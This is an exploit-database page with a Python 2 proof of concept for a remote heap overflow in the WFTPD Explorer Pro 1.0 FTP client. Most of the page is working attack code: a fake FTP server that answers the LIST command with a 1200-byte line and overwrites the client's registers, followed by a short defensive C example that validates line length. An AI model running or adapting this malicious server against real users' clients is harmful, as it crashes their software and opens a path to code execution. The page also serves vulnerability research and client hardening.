0day.today - Biggest Exploit Database in the World.
WFTPD Explorer Pro 1.0 Remote Heap Overflow PoC
```python
##########################################
# WftpdExpPro_HeapPoC.py                 #
# Discovered by r4x (Kamil Szczerba)     #
# [r4xks@o2.pl]                          #
##########################################
# Soft    : WFTPD Explorer Pro 1.0       #
# Vendor  : Texas Imperial Software      #
# Vuln    : Heap Overflow (Res: LIST)    #
# Exploit : PoC Reg Overwrite            #
##########################################
# Reg:                                   #
# EAX = 41414141                         #
# ECX = 41414141                         #
# EDX = 00a57b38 ASCII "AAAA..."         #
# ESI = 00a57b30 ASCII "AAAA..."         #
# ------------------------------         #
# EIP = 7c91142E                         #
#                                        #
# Exception c0000005 (ACCESS_VIOLATION)  #
#                                        #
# MOV DWORD PTR DS:[ECX],EAX ; HEHE      #
# MOV DWORD PTR DS:[EAX +4] ECX ;        #
#                                        #
# Test on: WinXPsp2 Polish               #
#                                        #
##########################################

# Python 2 script (print statements, str sockets).
from socket import *

# Over-long directory listing returned on the data connection after LIST.
heapb0f = "A" * 1200 + "r\n"

# Commands the fake server recognises, index-matched with the replies below.
req = (
    "USER",
    "PASS",
    "TYPE",
    "PWD",
    "PASV",
    "LIST"
    )

res = (
    "331 Password required.\r\n",
    "230 User logged in.\r\n",
    "200 Type set to I.\r\n",
    "257 '/' is current directory.\r\n",
    "227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
    "150 Opening ASCII mode data connection for file list.\r\n",
    )

def parser(buff):
    # Take the command verb: text up to the first space or CRLF, whichever is shorter.
    cmd = buff.split("\x20")[0]
    cmd1 = buff.split("\r\n")[0]
    if len(cmd) > len(cmd1):
        cmd = cmd1
    for i in range(len(req)):
        if req[i] == cmd:
            return res[i]

def multiserv(port1, port2):
    # Control channel listener.
    control = socket(AF_INET, SOCK_STREAM)
    control.bind(('', port1))
    control.listen(1)
    # Data channel listener; port2 must match the PASV reply (100*256 + 100 = 25700).
    trans = socket(AF_INET, SOCK_STREAM)
    trans.bind(('', port2))
    trans.listen(1)
    while(1):
        cclient, caddr = control.accept()
        print "[*] Connected: ", caddr
        cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n")
        while(1):
            r0 = cclient.recv(1024)
            print "[>] Input: %s" % (r0)
            r1 = parser(r0)
            if r1 == None:
                r1 = "502 Command not implemented.\r\n"
            cclient.send(r1)
            print "[<] Output: %s" % (r1)
            if r1 == res[4]:
                # PASV acknowledged: wait for the client's data connection.
                print "[*] Data mode\n"
                tclient, taddr = trans.accept()
                print "[*] Connected: ", taddr
            if r1 == res[5]:
                # LIST acknowledged: send the over-long listing on the data channel.
                print "[*] b00mb!"
                tclient.send(heapb0f)
                print "[*] done"
                break
        break

multiserv(21, 25700)

# 0day.today [2024-07-02] #
```
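The PoC triggers the fault with a single 1200-byte line in the LIST response, so the client-side fix is to check each listing line's length before copying it. The following is an added example, not code from the PoC author or the vendor; it assumes the client stores listing lines in a fixed-size buffer, and `LIST_LINE_MAX`, `list_parse` and `sum_len` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

#define LIST_LINE_MAX 512   /* assumed per-line limit; not taken from the vendor's code */

typedef void (*line_cb)(const char *line, size_t len, void *ctx);

/* Sample callback: adds up accepted line lengths in *ctx (a size_t). */
static void sum_len(const char *line, size_t len, void *ctx)
{
    (void)line;
    *(size_t *)ctx += len;
}

/* Walk a LIST data-channel buffer line by line, checking each line's length
 * before copying it into the fixed buffer. Returns the number of non-empty
 * lines delivered, or -1 on an over-long line (caller aborts the transfer). */
static int list_parse(const char *data, size_t n, line_cb cb, void *ctx)
{
    char line[LIST_LINE_MAX + 1];
    size_t start = 0;
    int count = 0;
    while (start < n) {
        const char *nl = memchr(data + start, '\n', n - start);
        size_t len = nl ? (size_t)(nl - (data + start)) : n - start;
        size_t next = nl ? start + len + 1 : n;
        if (len > 0 && data[start + len - 1] == '\r')
            len--;                      /* strip the CR of a CRLF ending */
        if (len > LIST_LINE_MAX)
            return -1;                  /* reject; never copy first and check later */
        if (len > 0) {
            memcpy(line, data + start, len);
            line[len] = '\0';
            cb(line, len, ctx);
            count++;
        }
        start = next;
    }
    return count;
}

int main(void)
{
    char big[1202];                     /* constructed: same shape as the PoC's LIST payload */
    size_t total = 0;
    memset(big, 'A', 1200);
    big[1200] = 'r';
    big[1201] = '\n';
    printf("oversized listing -> %d\n", list_parse(big, sizeof big, sum_len, &total));
    return 0;
}
```

Rejecting the whole listing rather than truncating the line keeps a hostile server from steering what the client displays or stores.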